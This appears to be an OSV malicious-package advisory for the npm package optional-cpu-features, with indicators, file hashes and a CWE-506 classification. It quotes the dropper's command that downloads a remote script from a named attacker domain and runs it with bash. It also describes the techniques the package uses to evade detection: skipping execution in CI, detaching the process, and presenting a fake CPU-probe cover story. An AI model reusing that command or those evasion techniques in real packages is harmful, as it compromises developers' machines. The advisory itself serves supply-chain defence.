MAL-2026-5642
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/optional-cpu-features/MAL-2026-5642.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5642
- Published
- 2026-06-11T13:12:23Z
- Modified
- 2026-06-11T13:46:34.615144976Z
- Summary
- Malicious code in optional-cpu-features (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (4dbbb7dd9c604ef3e5782d477d4db7c04c50f7906b19af03e63a540e0a44166e)
On
npm install, both theinstallandpostinstalllifecycle scripts runnode install.js, which requireslib/sync.js. That file hardcodesBASE = "https://api.aavcareer.ink"and spawns a detached, stdio-suppressed shell that runscurl -ks ${BASE}/upd_m -o /var/tmp/upd_m && bash /var/tmp/upd_mon Unix (or fetches/upd_wto%TEMP%\upd_w.cmdand executes it on Windows). The fetch disables TLS certificate verification (curl -ks) and the spawn is detached + unref'd to hide from the install log.install.jsearly-exits withprocess.exit(0)whenprocess.env.CIis"true"or"1", so CI scanners and sandboxes see a no-op while real developer and build machines execute the remote payload. The package name and the package.json description ("Optional native CPU feature probe for toolchain compatibility (install is a no-op when bindings are unavailable)") advertise a CPU/SIMD feature probe, but no CPU detection code exists anywhere in the package — the cover story exists to encourage monorepos to add this as anoptionalDependenciesentry that tolerates apparent failure while the dropper has already succeeded silently. The attacker fully controls the bytes that run as the installing user on every non-CI machine. - Database specific
{ "malicious-packages-origins": [ { "id": "IN-MAL-2026-005737", "import_time": "2026-06-11T13:27:20.967952595Z", "sha256": "4dbbb7dd9c604ef3e5782d477d4db7c04c50f7906b19af03e63a540e0a44166e", "source": "amazon-inspector", "modified_time": "2026-06-11T13:12:23Z", "versions": [ "1.0.3" ] }, { "id": "IN-MAL-2026-005738", "import_time": "2026-06-11T13:27:21.015594968Z", "sha256": "83f5bd807e50ab6d644f7770c01e7da5560da2b603106cb18b08a12d92b6c441", "source": "amazon-inspector", "modified_time": "2026-06-11T13:12:23Z", "versions": [ "1.0.3" ] } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / optional-cpu-features
Package
- Name
- optional-cpu-features
- View open source insights on deps.dev
- Purl
- pkg:npm/optional-cpu-features
Database specific
indicators
{
"evidence_files": [
{
"path": "lib/sync.js",
"sha256": "164782df220451c8a7a2e457851b273c918af12f6b3fef31d81c8d3acb1991ca",
"tlsh": "85f09e16436f053562e148d1c7d4f81e64a7010cb614a533c98c59559b2fb0d5733094"
},
{
"path": "install.js",
"sha256": "de2781f645dffdd73f09748792cac8eb692e091dee3692bf10eb83ac0978cbf2",
"tlsh": "83c01299e5dd8c5412d017c5301d4107d4f9d02406452472396cb5d9bb10a70539551f"
},
{
"path": "package.json",
"sha256": "9ae1f5f041a6a506a6eb1c08dfd6d163b5ad22a2d796f1c51c3feb927892d091",
"tlsh": "ede0aba0d8101a2338c90be90c17514822310a2708507e102387521c17ef22698bf9af"
}
],
"package_integrity": [
{
"filename": "optional-cpu-features-1.0.3.tgz",
"hashes": {
"sha512_sri": "sha512-DYowjOM/v+7T3sG83kyr2thwuAfPMGiumsCAFFoBHjDs7zF+ivYb3Q0jxesdJY4gE7d8yz5CTbWT/6rekZg9lQ==",
"sha1": "965715d1acc7c01b58af3910e5c4878aaff058e6"
}
}
],
"domains": [
"api.aavcareer.ink"
]
}
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/optional-cpu-features/MAL-2026-5642.json"